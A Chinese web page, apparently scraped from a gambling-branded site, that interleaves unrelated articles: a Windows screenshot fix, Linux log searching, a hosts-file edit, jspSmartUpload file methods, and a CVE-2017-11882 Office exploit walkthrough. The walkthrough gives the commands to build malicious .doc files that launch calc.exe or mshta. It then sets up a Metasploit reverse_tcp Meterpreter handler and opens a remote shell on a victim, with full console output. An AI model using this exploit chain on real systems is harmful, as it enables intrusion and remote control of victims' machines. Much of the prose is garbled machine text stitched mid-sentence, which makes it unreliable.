Linux日志查找方法,Msf利用复现
分类:金沙js6038

操作系统自带的截图工具无法保存问题,出现这种原因一般是对电脑的操作进行不当删除所致,一般来说很容易解决。

    双击我的电脑,打开资源管理器。
    在左侧找到库,选中并右击,点击还原默认库(R)。
    进入win7安装盘下的“用户目录”文件夹。
    新建文件夹,命名为 “我的图片”。
    修复完成,打开截图工具,尝试保存。

Linux日志查找方法

适用于测量试验,开垦,运行职员,用来查找Linux服务器难点的貌似方法,相比较实用,假如有更加好的措施能够一块探讨,迎接大神们来教导哈!!!

跻身正题

  大家驾驭localhost绑定的是本土主机IP(127.0.0.1卡塔尔国,那么咱们能否自定义绑定当地主机IP地址呢?答案是自然的,同修正hosts文件,大家能够实现地点的供给。

㈠ File类

清晨时候接到了推送的疏漏预先警报,在网络搜寻相关音讯来看数不完大牌已经付出出生成doc文书档案的本子和msf的poc,本文记录CVE-2017-11882 漏洞在 Msf下的施用。

 

率先步、通过Xshell登入服务器

链接方法—找度娘、开拓同事#十二万分是团结找度娘,自立门户男耕女织嘛
账号、密码—找技巧特别

 图片 1

  张开本地C盘,找到Windows文件夹-->System32文本夹-->drivers文件夹-->etc文件下的hosts文件,使用管理员身份打开,然后您就精通了。

  那么些类包装了三个上传文件的全体音信。通过它,能够拿走上传文件的公文名、文件大小、扩大名、文件数量等新闻。

 

其次步、进入log日志目录

动用到另个指令:ll、cd

 图片 2

 

# Copyright (c) 1993-2009 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
#      102.54.94.97     rhino.acme.com          # source server
#       38.25.63.10     x.acme.com              # x client host

# localhost name resolution is handled within DNS itself.
#    127.0.0.1       localhost
#    ::1             localhost
    127.0.0.1       m.hpugs.com

  File类首要提供以下方法:

0x00 漏洞简单介绍

二零一七年三月14日,微软公布了1月份的安全补丁更新,当中比较引人关怀的骨子里悄然修复了隐形17年之久的Office远程代码试行漏洞(CVE-2017-11882卡塔 尔(英语:State of Qatar)。该漏洞为Office内部存款和储蓄器破坏漏洞,影响当下风行的保有Office版本。攻击者能够行使漏洞以如今报到的客户的身价履行大肆命令。 由于漏洞影响面较广,漏洞表露后,金睛安全讨论团体持续对漏洞有关攻击事件进展关爱。11月二十二日,监察和控制到了本来就有漏洞POC在互连网流传,随时连忙对有关样品实行了剖判。近日该样板满世界仅微软杀毒能够检查评定。

  • 漏洞影响版本:
  • Office 365
  • Microsoft Office 2000
  • Microsoft Office 2003
  • Microsoft Office 2007 Service Pack 3
  • Microsoft Office 2010 Service Pack 2
  • Microsoft Office 2013 Service Pack 1
  • Microsoft Office 2016

 

 

 

其三步、将包涵关键字的日志保存到新的公文

使用到cat、grep命令

 图片 3

cat –n 日志名 |grep ‘关键字’  >保存文件名

  白灰部分即为我设置的绑定本地IP的域名(域名能够轻松安装卡塔尔国

1、saveAs效率:将文件换名另存。

0x01 利用工具清单:

a) tcp反弹:kali 172.16.253.76 

b) 安装office2013的系统:win7 172.16.253.4

 

  1. Msf 用到的 Poc

  2. office二零一一、激活工具

  3. win7旗舰版ISO镜像

上述工具已经打包好,下载地址:

链接:  密码:xl91

图片 4

 

第四步、下载到本地

 图片 5

图片 6

sz:发送文书到地面
rz:发送文书到服务器 #见状了,就扩大下哈

原型:

0x02 利用进程

  1. 生成doc

    #安装运转nginx [root@ihoneysec ~]# yum -y install nginx [root@ihoneysec ~]# cd /usr/share/nginx/html/
    [root@ihoneysec html]# systemctl start nginx

    #下载生成doc的python脚本 [root@ihoneysec ~]# git clone [root@ihoneysec ~]# cd CVE-2017-11882/ [root@ihoneysec CVE-2017-11882]# ls Command109b_CVE-2017-11882.py Command43b_CVE-2017-11882.py example README.md

    #生成测量检验doc [root@ihoneysec CVE-2017-11882]# python Command43b_CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o cve.doc [*] Done ! output file --> cve.doc [root@ihoneysec CVE-2017-11882]# cp cve.doc /usr/share/nginx/html/

    #生成msf利用的doc [root@ihoneysec CVE-2017-11882]# python Command43b_CVE-2017-11882.py -c "mshta " -o cve2.doc [*] Done ! output file --> cve2.doc [root@ihoneysec CVE-2017-11882]# cp cve2.doc /usr/share/nginx/html/

    #放到网址根目录 Linux日志查找方法,Msf利用复现。[root@ihoneysec CVE-2017-11882]# ls /usr/share/nginx/html/ 404.html 50x.html cve.doc cve2.doc index.html nginx-logo.png poweredby.png

  

  1. 测量检验日常弹出calc.exe总结器

图片 7

 

  1. kali msf配置Poc:

    root@kali:~# cd / # 将下载好的漏洞模块放在msf大肆目录下 root@kali:/# mv cve_2017_11882.rb /usr/share/metasploit-framework/modules/exploits/windows/smb/ # 检查ip地址 root@kali:/mnt/hgfs/kalishare# ifconfig eth0: flags=4163 mtu 1500

         inet 172.16.253.76  netmask 255.255.0.0  broadcast 172.16.255.255
         inet6 fe80::20c:29ff:fef5:82af  prefixlen 64  scopeid 0x20<link>
         ether 00:0c:29:f5:82:af  txqueuelen 1000  (Ethernet)
         RX packets 3136  bytes 987402 (964.2 KiB)
         RX errors 0  dropped 0  overruns 0  frame 0
         TX packets 255  bytes 20912 (20.4 KiB)
         TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
    

    # 启动postgresql服务,打开msf root@kali:/mnt/hgfs/kalishare# service postgresql start
    root@kali:/mnt/hgfs/kalishare# msfconsole

    ...

        =[ metasploit v4.16.6-dev                          ]
    
    • -- --=[ 1683 exploits - 964 auxiliary - 297 post ]
    • -- --=[ 498 payloads - 40 encoders - 10 nops ]
    • -- --=[ Free Metasploit Pro trial: ] # 搜索cve_2017_11882 漏洞模块 msf > search cve_2017_11882

      Matching Modules

      Name Disclosure Date Rank Description


      exploit/windows/smb/cve_2017_11882 normal Microsoft Office Payload Delivery

      # 使用该模块 msf > use exploit/windows/smb/cve_2017_11882 # 设置payload为反弹tcp msf exploit(cve_2017_11882) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp # 设置本机ip msf exploit(cve_2017_11882) > set lhost 172.16.253.76 lhost => 172.16.253.76 # 设置uri的门道,要与第一步生成doc时布署风度翩翩致 msf exploit(cve_2017_11882) > set ULX570IPATH abc UTiguanIPATH => abc # 检查当前配备 msf exploit(cve_2017_11882) > show options

      Module options (exploit/windows/smb/cve_2017_11882): Name Current Setting Required Description


      SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 SRVPORT 8080 yes The local port to listen on. SSL false no Negotiate SSL for incoming connections SSLCert no Path to a custom SSL certificate (default is randomly generated) URIPATH abc no The URI to use for this exploit (default is random)

      Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description


      EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 172.16.253.76 yes The listen address LPORT 4444 yes The listen port

      ...

      # 运行利用后,msf会监听本机8080端口,借使win7机器展开doc触发访谈172.16.253.76:8080/abc就能够收获反弹到4444端口的tcp会话 msf exploit(cve_2017_11882) > exploit [] Exploit running as background job 0. # 起首监听 [] Started reverse TCP handler on 172.16.253.76:4444 msf exploit(cve_2017_11882) > [] Using URL: [] Local IP: [] Server started. [] Place the following DDE in an MS document: mshta.exe "" msf exploit(cve_2017_11882) > [] 172.16.253.4 cve_2017_11882 - Delivering payload [] Sending stage (179267 bytes) to 172.16.253.4 #收到反弹tcp连接 [] Meterpreter session 1 opened (172.16.253.76:4444 -> 172.16.253.4:49272) at 2017-11-23 15:14:06 +0800 [] 172.16.253.4 cve_2017_11882 - Delivering payload [] Sending stage (179267 bytes) to 172.16.253.4 [] Meterpreter session 2 opened (172.16.253.76:4444 -> 172.16.253.4:49274) at 2017-11-23 15:14:17 +0800

      msf exploit(cve_2017_11882) > msf exploit(cve_2017_11882) > msf exploit(cve_2017_11882) > sessions # 查看已经创建的反弹会话

      Active sessions

      Id Type Information Connection


      1 meterpreter x86/windows win7-PCwin7 @ WIN7-PC 172.16.253.76:4444 -> 172.16.253.4:49272 (172.16.253.4) # 进入id为1的会话 msf exploit(cve_2017_11882) > sessions -i 1 [*] Starting interaction with 1... # 验证获得反弹连接是还是不是是win7机器ip meterpreter > ipconfig

      Interface 11

      Name : Intel(R) PRO/1000 MT Network Connection Hardware MAC : 00:0c:29:72:2e:7d MTU : 1500 IPv4 Address : 172.16.253.4 IPv4 Netmask : 255.255.0.0 IPv6 Address : fe80::c15d:3813:94ec:d6c8 IPv6 Netmask : ffff:ffff:ffff:ffff::

      ...... # 步入命令方式meterpreter > shell Process 2924 created. Channel 1 created. Microsoft Windows [�汾 6.1.7601] ��Ȩ���� (c) 二〇〇八 Microsoft Corporation����������Ȩ���� # 查看当前系统客户、主机名 C:Windowssystem32>net user net user

      WIN7-PC ���û��ʻ�


    Administrator Guest win7
    �����ɹ����ɡ�

C:Windowssystem32>

  

 

第五步、使用文本编辑器查看xxx.txt文件

1,作者动用的是Notepad++文本编辑器来查看
2,使用飞速键Ctrl+f,进行时限筛选,如下:

图片 8*

 

那是日记查询艺术,主假如扶持开垦用来定位特别难以查到的难题,缩没万分的约束,加速解决难点的日子,将损失火速失降低到最低…

public void saveAs(java.lang.String destFilePathName)

public void saveAs(java.lang.String destFilePathName, int optionSaveAs)

在那之中,destFilePathName是另存的文书名,optionSaveAs是另存的选项,该选取有多少个值,分别是SAVEAS_PHYSICAL,SAVEAS_VIRTUAL,SAVEAS_AUTO。SAVEAS_PHYSICAL注解以操作系统的根目录为文件根目录另存文件,SAVEAS_VIRTUAL注脚以Web应用程序的根目录为文件根目录另存文件,SAVEAS_AUTO则意味着让组件决定,当Web应用程序的根目录存在另存文件的目录时,它会采纳SAVEAS_VIRTUAL,否则会筛选SAVEAS_PHYSICAL。

例如,saveAs("/upload/sample.zip",SAVEAS_PHYSICAL)施行后若Web服务器安装在C盘,则另存的文书名实际是c:uploadsample.zip。而saveAs("/upload/sample.zip",SAVEAS_VIRTUAL)执行后若Web应用程序的根目录是webapps/jspsmartupload,则另存的文书名实际是webapps/jspsmartupload/upload/sample.zip。saveAs("/upload/sample.zip",SAVEAS_AUTO)推行时若Web应用程序根目录下存在upload目录,则其效果同saveAs("/upload/sample.zip",SAVEAS_VIRTUAL),否则同saveAs("/upload/sample.zip",SAVEAS_PHYSICAL)。

建议:对于Web程序的付出来说,最佳使用SAVEAS_VIRTUAL,以便移植。

2、isMissing

效果:那么些方法用于判定顾客是或不是选用了文本,也即对应的表单项是不是有值。接纳了文件时,它回到false。未选文件时,它回到true。

原型:public boolean isMissing()

3、getFieldName

成效:取HTML表单中对应于此上传文件的表单项的名字。

原型:public String getFieldName()

4、getFileName

效果:取文件名(不含目录音信卡塔尔国

原型:public String getFileName()

5、getFilePathName

意义:取文件全名(带目录卡塔 尔(阿拉伯语:قطر‎

原型:public String getFilePathName

6、getFileExt

本文由金沙澳门官网网址发布于金沙js6038,转载请注明出处:Linux日志查找方法,Msf利用复现

上一篇:没有了 下一篇:没有了
猜你喜欢
热门排行
精彩图文